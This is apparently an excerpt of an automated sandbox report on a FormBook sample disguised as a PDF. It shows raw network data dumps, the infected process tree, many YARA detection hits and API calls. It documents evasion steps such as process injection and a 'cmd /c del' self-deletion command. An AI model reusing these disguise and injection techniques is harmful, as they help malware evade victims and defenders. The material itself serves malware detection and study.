91 32
                                                                            Data Ascii: 7",ym%r*YjmjrWBFJLs8+C|lz^[W7l[F7i06dOYq8CFl[F".TG9=}jU2Jwb*a|Cf> (hXa{>5'QwG<q/`1HFd\42
                                                                            2021-12-01 15:23:21 UTC 867 IN Data Raw: ab 26 48 4a 13 4e 29 3b 0e bb ee d9 2c bb 74 74 ff 9b b6 d5 1a 5d 32 5a 4e dd 05 99 99 55 cd a1 4b f7 2f d3 2d 99 bc dc f0 73 f4 bc f1 33 21 f5 4b e1 c5 c3 12 5c 90 b9 d3 90 ea e3 14 e3 1e 7d 06 2f 88 6f b5 a9 e8 57 6b 92 cb 5c b7 fc d0 f8 fc 5b b1 93 32 a5 41 dc ec 7a 06 07 9e e2 45 59 ac 4f 78 57 68 26 b7 d9 f7 27 ca 0c 7e 03 ef bb da 07 e5 65 a5 05 fa a7 3c f8 41 75 8e 32 61 55 46 84 54 94 5a ca d3 1e 13 ad 7a d5 f7 c7 0e 80 29 d9 f7 37 6c bc e2 40 ed 6d 35 bc b4 a0 6f 7b 55 b3 0d 3d 7d 86 6f fa 4b 5a 35 e4 6d 98 df 9b 92 c2 33 56 b4 a0 6c d3 85 ab bb f5 49 eb 56 08 74 17 c7 4b 5a 35 b2 9f cf 27 32 5a be b8 af 7b ba da ff cb 22 b1 c0 35 1d 59 c2 3b 35 63 03 37 27 34 9c 78 cd dd 46 bf 39 07 6a c2 87 24 31 ad 0e 00 cd 5e d8 de 75 03 9b 1e 95 e2 fb 81 f2
                                                                            Data Ascii: &HJN);,tt]2ZNUK/-s3!K\}/oWk\[2AzEYOxWh&'~e<Au2aUFTZz)7l@m5o{U=}oKZ5m3VlIVtKZ5'2Z{"5Y;5c7'4xF9j$1^u
                                                                            2021-12-01 15:23:21 UTC 883 IN Data Raw: ab e0 8d 74 74 ff cf 63 55 f0 b7 f7 4c 99 55 36 35 6b 69 25 1d a2 d0 e6 5c 64 d7 76 c3 8d 35 e2 52 0d 7a 1b 2a 0b 0d be 3c 8c c3 b9 e1 78 09 1e 28 55 32 5a d6 f5 c2 d3 6d 06 e8 48 6e 0f 7c 9f 03 bc 3f a8 12 c9 ed 45 c0 bf f3 94 50 e4 bf 23 b8 21 4c cb 7a f1 47 f0 c6 77 87 ee 96 41 a1 0f 7c ec 23 5d 54 dd 86 2c 40 4d e4 99 20 7d b5 dd 79 73 8d 04 77 17 54 50 5a 41 67 dc 0b 79 8c 37 d7 8d 3f 03 66 88 b8 56 fc dd 85 e0 83 75 ab 09 35 45 12 1f 20 25 46 c4 4b 3c 06 ed 52 ea d1 68 a0 c9 40 dc 94 c0 7d 95 a7 ff db c0 19 84 1a 9d 25 ba ee 96 49 11 81 40 ae 40 f4 40 7d 96 54 17 97 96 f2 1b 34 5b 48 71 ab 09 74 ff da 47 d9 ca d8 f9 25 7b 5b c8 d2 aa 20 8d 57 b6 35 72 39 ef c7 4b 58 30 57 be bd 66 55 3a e7 55 0b 7d c7 c4 c8 93 6a 46 59 30 d8 fa 4f 20 d2 29 45 c0 9f
                                                                            Data Ascii: ttcULU65ki%\dv5Rz*<x(U2ZmHn|?EP#!LzGwA|#]T,@M }yswTPZAgy7?fVu5E %FK<Rh@}%I@@@}T4[HqtG%{[ W5r9KX0WfU:U}jFY0O )E

                                                                            Code Manipulations

                                                                            Statistics

                                                                            CPU Usage

                                                                            Memory Usage

                                                                            High Level Behavior Distribution

                                                                            Behavior

                                                                            System Behavior

                                                                            Analysis Process: DOC209272621615.PDF.exe PID: 5616 Parent PID: 5268

                                                                            General

                                                                            Start time: 16:22:55
                                                                            Start date: 01/12/2021
                                                                            Path: C:\Users\user\Desktop\DOC209272621615.PDF.exe
                                                                            Wow64 process (32bit): true
                                                                            Commandline: "C:\Users\user\Desktop\DOC209272621615.PDF.exe"
                                                                            Imagebase: 0x400000
                                                                            File size: 701952 bytes
                                                                            MD5 hash: E5D9DB9823FB854169E25FCECA42E804
                                                                            Has elevated privileges: true
                                                                            Has administrator privileges: true
                                                                            Programmed in: Borland Delphi
                                                                            Yara matches:
                                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000000.295287350.00000000038E3000.00000004.00000001.sdmp, Author: Joe Security
                                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000000.295287350.00000000038E3000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000000.295287350.00000000038E3000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.334679188.00000000038E3000.00000004.00000001.sdmp, Author: Joe Security
                                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.334679188.00000000038E3000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.334679188.00000000038E3000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000000.299285834.00000000038E3000.00000004.00000001.sdmp, Author: Joe Security
                                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000000.299285834.00000000038E3000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000000.299285834.00000000038E3000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                            Reputation: low

                                                                            Analysis Process: logagent.exe PID: 4024 Parent PID: 5616

                                                                            General

                                                                            Start time: 16:22:57
                                                                            Start date: 01/12/2021
                                                                            Path: C:\Windows\SysWOW64\logagent.exe
                                                                            Wow64 process (32bit):
                                                                            Commandline: C:\Windows\System32\logagent.exe
                                                                            Imagebase:
                                                                            File size: 86016 bytes
                                                                            MD5 hash: E2036AC444AB4AD91EECC1A80FF7212F
                                                                            Has elevated privileges: true
                                                                            Has administrator privileges: true
                                                                            Programmed in: C, C++ or other language
                                                                            Reputation: moderate

                                                                            Analysis Process: WerFault.exe PID: 2888 Parent PID: 5616

                                                                            General

                                                                            Start time: 16:23:02
                                                                            Start date: 01/12/2021
                                                                            Path: C:\Windows\SysWOW64\WerFault.exe
                                                                            Wow64 process (32bit): true
                                                                            Commandline: C:\Windows\SysWOW64\WerFault.exe -u -p 5616 -s 2132
                                                                            Imagebase: 0xcf0000
                                                                            File size: 434592 bytes
                                                                            MD5 hash: 9E2B8ACAD48ECCA55C0230D63623661B
                                                                            Has elevated privileges: true
                                                                            Has administrator privileges: true
                                                                            Programmed in: C, C++ or other language
                                                                            Reputation: high

                                                                            Analysis Process: Wkklnmcz.exe PID: 5352 Parent PID: 3352

                                                                            General

                                                                            Start time: 16:23:11
                                                                            Start date: 01/12/2021
                                                                            Path: C:\Users\user\Contacts\Wkklnmcz.exe
                                                                            Wow64 process (32bit): true
                                                                            Commandline: "C:\Users\user\Contacts\Wkklnmcz.exe"
                                                                            Imagebase: 0x400000
                                                                            File size: 701952 bytes
                                                                            MD5 hash: E5D9DB9823FB854169E25FCECA42E804
                                                                            Has elevated privileges: false
                                                                            Has administrator privileges: false
                                                                            Programmed in: Borland Delphi
                                                                            Yara matches:
                                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.337807666.00000000036CE000.00000004.00000001.sdmp, Author: Joe Security
                                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.337807666.00000000036CE000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.337807666.00000000036CE000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.337915217.0000000072481000.00000020.00000001.sdmp, Author: Joe Security
                                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.337915217.0000000072481000.00000020.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.337915217.0000000072481000.00000020.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                            • Rule: Typical_Malware_String_Transforms, Description: Detects typical strings in a reversed or otherwise modified form, Source: C:\Users\user\Contacts\Wkklnmcz.exe, Author: Florian Roth
                                                                            Antivirus matches:
                                                                            • Detection: 33%, ReversingLabs
                                                                            Reputation: low

                                                                            Analysis Process: logagent.exe PID: 6664 Parent PID: 5352

                                                                            General

                                                                            Start time: 16:23:15
                                                                            Start date: 01/12/2021
                                                                            Path: C:\Windows\SysWOW64\logagent.exe
                                                                            Wow64 process (32bit): true
                                                                            Commandline: C:\Windows\System32\logagent.exe
                                                                            Imagebase: 0x13d0000
                                                                            File size: 86016 bytes
                                                                            MD5 hash: E2036AC444AB4AD91EECC1A80FF7212F
                                                                            Has elevated privileges: false
                                                                            Has administrator privileges: false
                                                                            Programmed in: C, C++ or other language
                                                                            Yara matches:
                                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000000.333032851.0000000072480000.00000040.00000001.sdmp, Author: Joe Security
                                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000000.333032851.0000000072480000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000000.333032851.0000000072480000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.429892109.0000000000920000.00000040.00020000.sdmp, Author: Joe Security
                                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.429892109.0000000000920000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.429892109.0000000000920000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000000.333478608.0000000072480000.00000040.00000001.sdmp, Author: Joe Security
                                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000000.333478608.0000000072480000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000000.333478608.0000000072480000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000000.332508097.0000000072480000.00000040.00000001.sdmp, Author: Joe Security
                                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000000.332508097.0000000072480000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000000.332508097.0000000072480000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.429963665.0000000000950000.00000040.00020000.sdmp, Author: Joe Security
                                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.429963665.0000000000950000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.429963665.0000000000950000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000000.331906773.0000000072480000.00000040.00000001.sdmp, Author: Joe Security
                                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000000.331906773.0000000072480000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000000.331906773.0000000072480000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.434946017.0000000072480000.00000040.00000001.sdmp, Author: Joe Security
                                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.434946017.0000000072480000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.434946017.0000000072480000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                            Reputation: moderate

                                                                            Analysis Process: explorer.exe PID: 3352 Parent PID: 6664

                                                                            General

                                                                            Start time: 16:23:19
                                                                            Start date: 01/12/2021
                                                                            Path: C:\Windows\explorer.exe
                                                                            Wow64 process (32bit): false
                                                                            Commandline: C:\Windows\Explorer.EXE
                                                                            Imagebase: 0x7ff720ea0000
                                                                            File size: 3933184 bytes
                                                                            MD5 hash: AD5296B280E8F522A8A897C96BAB0E1D
                                                                            Has elevated privileges: false
                                                                            Has administrator privileges: false
                                                                            Programmed in: C, C++ or other language
                                                                            Yara matches:
                                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000000.376476666.0000000010064000.00000040.00020000.sdmp, Author: Joe Security
                                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000000.376476666.0000000010064000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000000.376476666.0000000010064000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000000.391644403.0000000005D72000.00000040.00020000.sdmp, Author: Joe Security
                                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000000.391644403.0000000005D72000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000000.391644403.0000000005D72000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000000.390610840.0000000010064000.00000040.00020000.sdmp, Author: Joe Security
                                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000000.390610840.0000000010064000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000000.390610840.0000000010064000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000000.411143671.0000000010064000.00000040.00020000.sdmp, Author: Joe Security
                                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000000.411143671.0000000010064000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000000.411143671.0000000010064000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                            Reputation: high

                                                                            Analysis Process: Wkklnmcz.exe PID: 5368 Parent PID: 3352

                                                                            General

                                                                            Start time: 16:23:19
                                                                            Start date: 01/12/2021
                                                                            Path: C:\Users\user\Contacts\Wkklnmcz.exe
                                                                            Wow64 process (32bit): true
                                                                            Commandline: "C:\Users\user\Contacts\Wkklnmcz.exe"
                                                                            Imagebase: 0x400000
                                                                            File size: 701952 bytes
                                                                            MD5 hash: E5D9DB9823FB854169E25FCECA42E804
                                                                            Has elevated privileges: false
                                                                            Has administrator privileges: false
                                                                            Programmed in: Borland Delphi
                                                                            Yara matches:
                                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.352614232.000000000380E000.00000004.00000001.sdmp, Author: Joe Security
                                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.352614232.000000000380E000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.352614232.000000000380E000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.352808142.0000000072481000.00000020.00000001.sdmp, Author: Joe Security
                                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.352808142.0000000072481000.00000020.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.352808142.0000000072481000.00000020.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                            Reputation: low

                                                                            Analysis Process: mobsync.exe PID: 7152 Parent PID: 5368

                                                                            General

                                                                            Start time: 16:23:23
                                                                            Start date: 01/12/2021
                                                                            Path: C:\Windows\SysWOW64\mobsync.exe
                                                                            Wow64 process (32bit): true
                                                                            Commandline: C:\Windows\System32\mobsync.exe
                                                                            Imagebase: 0xb90000
                                                                            File size: 93184 bytes
                                                                            MD5 hash: 44C19378FA529DD88674BAF647EBDC3C
                                                                            Has elevated privileges: false
                                                                            Has administrator privileges: false
                                                                            Programmed in: C, C++ or other language
                                                                            Yara matches:
                                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000C.00000002.460149911.0000000002EE0000.00000040.00020000.sdmp, Author: Joe Security
                                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000C.00000002.460149911.0000000002EE0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000C.00000002.460149911.0000000002EE0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000C.00000002.455193853.0000000000AC0000.00000040.00020000.sdmp, Author: Joe Security
                                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000C.00000002.455193853.0000000000AC0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000C.00000002.455193853.0000000000AC0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000C.00000000.348032682.0000000072480000.00000040.00000001.sdmp, Author: Joe Security
                                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000C.00000000.348032682.0000000072480000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000C.00000000.348032682.0000000072480000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000C.00000000.348616604.0000000072480000.00000040.00000001.sdmp, Author: Joe Security
                                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000C.00000000.348616604.0000000072480000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000C.00000000.348616604.0000000072480000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000C.00000000.347239632.0000000072480000.00000040.00000001.sdmp, Author: Joe Security
                                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000C.00000000.347239632.0000000072480000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000C.00000000.347239632.0000000072480000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000C.00000000.349144544.0000000072480000.00000040.00000001.sdmp, Author: Joe Security
                                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000C.00000000.349144544.0000000072480000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000C.00000000.349144544.0000000072480000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000C.00000002.462816112.0000000072480000.00000040.00000001.sdmp, Author: Joe Security
                                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000C.00000002.462816112.0000000072480000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000C.00000002.462816112.0000000072480000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                            Reputation: moderate

                                                                            Analysis Process: rundll32.exe PID: 3372 Parent PID: 3352

                                                                            General

                                                                            Start time: 16:23:58
                                                                            Start date: 01/12/2021
                                                                            Path: C:\Windows\SysWOW64\rundll32.exe
                                                                            Wow64 process (32bit): true
                                                                            Commandline: C:\Windows\SysWOW64\rundll32.exe
                                                                            Imagebase: 0x160000
                                                                            File size: 61952 bytes
                                                                            MD5 hash: D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                            Has elevated privileges: false
                                                                            Has administrator privileges: false
                                                                            Programmed in: C, C++ or other language
                                                                            Yara matches:
                                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000012.00000002.816496652.0000000002E90000.00000040.00020000.sdmp, Author: Joe Security
                                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000012.00000002.816496652.0000000002E90000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000012.00000002.816496652.0000000002E90000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000012.00000002.810893268.00000000002E0000.00000004.00000001.sdmp, Author: Joe Security
                                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000012.00000002.810893268.00000000002E0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000012.00000002.810893268.00000000002E0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000012.00000002.816582225.0000000004350000.00000040.00020000.sdmp, Author: Joe Security
                                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000012.00000002.816582225.0000000004350000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000012.00000002.816582225.0000000004350000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                            Reputation: high

                                                                            Analysis Process: colorcpl.exe PID: 1008 Parent PID: 3352

                                                                            General

                                                                            Start time: 16:23:59
                                                                            Start date: 01/12/2021
                                                                            Path: C:\Windows\SysWOW64\colorcpl.exe
                                                                            Wow64 process (32bit):
                                                                            Commandline: C:\Windows\SysWOW64\colorcpl.exe
                                                                            Imagebase:
                                                                            File size: 86528 bytes
                                                                            MD5 hash: 746F3B5E7652EA0766BA10414D317981
                                                                            Has elevated privileges: false
                                                                            Has administrator privileges: false
                                                                            Programmed in: C, C++ or other language
                                                                            Reputation: moderate

                                                                            Analysis Process: cmd.exe PID: 5844 Parent PID: 3372

                                                                            General

                                                                            Start time: 16:24:03
                                                                            Start date: 01/12/2021
                                                                            Path: C:\Windows\SysWOW64\cmd.exe
                                                                            Wow64 process (32bit): true
                                                                            Commandline: /c del "C:\Windows\SysWOW64\logagent.exe"
                                                                            Imagebase: 0xd80000
                                                                            File size: 232960 bytes
                                                                            MD5 hash: F3BDBE3BB6F734E357235F4D5898582D
                                                                            Has elevated privileges: false
                                                                            Has administrator privileges: false
                                                                            Programmed in: C, C++ or other language
                                                                            Reputation: high

                                                                            Analysis Process: conhost.exe PID: 2940 Parent PID: 5844

                                                                            General

                                                                            Start time: 16:24:05
                                                                            Start date: 01/12/2021
                                                                            Path: C:\Windows\System32\conhost.exe
                                                                            Wow64 process (32bit): false
                                                                            Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                            Imagebase: 0x7ff7f20f0000
                                                                            File size: 625664 bytes
                                                                            MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                            Has elevated privileges: false
                                                                            Has administrator privileges: false
                                                                            Programmed in: C, C++ or other language
                                                                            Reputation: high

                                                                            Analysis Process: WWAHost.exe PID: 1956 Parent PID: 7152

                                                                            General

                                                                            Start time: 16:24:11
                                                                            Start date: 01/12/2021
                                                                            Path: C:\Windows\SysWOW64\WWAHost.exe
                                                                            Wow64 process (32bit): true
                                                                            Commandline: C:\Windows\SysWOW64\WWAHost.exe
                                                                            Imagebase: 0x970000
                                                                            File size: 829856 bytes
                                                                            MD5 hash: 370C260333EB3149EF4E49C8F64652A0
                                                                            Has elevated privileges: false
                                                                            Has administrator privileges: false
                                                                            Programmed in: C, C++ or other language
                                                                            Yara matches:
                                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000016.00000002.461388859.0000000003450000.00000040.00020000.sdmp, Author: Joe Security
                                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000016.00000002.461388859.0000000003450000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000016.00000002.461388859.0000000003450000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group

                                                                            Disassembly

                                                                            Code Analysis

                                                                            Analysis Process: DOC209272621615.PDF.exe PID: 5616 Parent PID: 5268

                                                                            Executed Functions

                                                                            APIs
                                                                            • GetModuleFileNameA.KERNEL32(00000000,?,00000105,00400000,00461790), ref: 00405E9C
                                                                            • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,00400000,00461790), ref: 00405EBA
                                                                            • RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,00400000,00461790), ref: 00405ED8
                                                                            • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 00405EF6
                                                                            • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,00405F85,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 00405F3F
                                                                            • RegQueryValueExA.ADVAPI32(?,004060EC,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,00405F85,?,80000001), ref: 00405F5D
                                                                            • RegCloseKey.ADVAPI32(?,00405F8C,00000000,?,?,00000000,00405F85,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 00405F7F
                                                                            • lstrcpynA.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 00405F9C
                                                                            • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 00405FA9
                                                                            • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 00405FAF
                                                                            • lstrlenA.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 00405FDA
                                                                            • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00406021
                                                                            • LoadLibraryExA.KERNEL32(?,00000000,?,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 00406031
                                                                            • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00406059
